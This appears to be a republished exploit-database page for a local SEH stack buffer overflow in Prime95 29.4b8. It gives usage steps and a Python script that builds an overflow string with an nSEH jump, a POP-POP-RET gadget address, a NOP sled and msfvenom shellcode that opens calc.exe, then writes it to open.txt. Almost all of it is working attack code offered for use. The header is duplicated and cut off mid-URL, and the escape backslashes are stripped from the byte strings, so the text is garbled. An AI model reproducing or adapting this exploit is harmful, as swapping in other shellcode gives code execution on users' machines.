Prime95 29.4b8 Stack Buffer Overflow

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 573

# Exploit Title: Prime95 Local Buffer Overflow (SEH)
# Date: 13-4-2018
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: https://www.mersenn # Exploit Title: Prime95 Local Buffer Overflow (SEH)
# Date: 13-4-2018
# Exploit Author: crash_manucoot
# Contact: twitter.com/crash_manucoot
# Vendor Homepage: https://www.mersenne.org/
# Software Link: https://www.mersenne.org/download/#download
# Version: 29.4b8
# Tested on: Windows 10 Pro x64 SPANISH Windows 7 Home Premium x86 SPANISH Windows XP SP3 SPANISH
# Category: Windows Local Exploit
# How to use: open the program go to test-PrimeNet-check the square-Connections paste the contents of open.txt in the optional proxy hostname field and the calculator will open

buffer = "A" * 660
nseh = "xebx06x90x90"
seh = "x6BxB0xEDx6A" #pop esi # pop ebx # ret | {PAGE_EXECUTE_READ} [libgmp-10.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0
nop = "x90" * 16

#msfvenom -p windows/exec CMD=calc.exe -b "x00" -f python -v shellcode
shellcode = ""
shellcode += "xbfxc6xdex94x3exdaxd0xd9x74x24xf4x5d"
shellcode += "x31xc9xb1x31x31x7dx13x03x7dx13x83xc5"
shellcode += "xc2x3cx61xc2x22x42x8ax3bxb2x23x02xde"
shellcode += "x83x63x70xaaxb3x53xf2xfex3fx1fx56xeb"
shellcode += "xb4x6dx7fx1cx7dxdbx59x13x7ex70x99x32"
shellcode += "xfcx8bxcex94x3dx44x03xd4x7axb9xeex84"
shellcode += "xd3xb5x5dx39x50x83x5dxb2x2ax05xe6x27"
shellcode += "xfax24xc7xf9x71x7fxc7xf8x56x0bx4exe3"
shellcode += "xbbx36x18x98x0fxccx9bx48x5ex2dx37xb5"
shellcode += "x6fxdcx49xf1x57x3fx3cx0bxa4xc2x47xc8"
shellcode += "xd7x18xcdxcbx7fxeax75x30x7ex3fxe3xb3"
shellcode += "x8cxf4x67x9bx90x0bxabx97xacx80x4ax78"
shellcode += "x25xd2x68x5cx6ex80x11xc5xcax67x2dx15"
shellcode += "xb5xd8x8bx5dx5bx0cxa6x3fx31xd3x34x3a"
shellcode += "x77xd3x46x45x27xbcx77xcexa8xbbx87x05"
shellcode += "x8dx34xc2x04xa7xdcx8bxdcxfax80x2bx0b"
shellcode += "x38xbdxafxbexc0x3axafxcaxc5x07x77x26"
shellcode += "xb7x18x12x48x64x18x37x2bxebx8axdbx82"
shellcode += "x8ex2ax79xdb"

evil = buffer + nseh + seh + nop + shellcode

file = open('open.txt','w+')
file.write(evil)
file.close()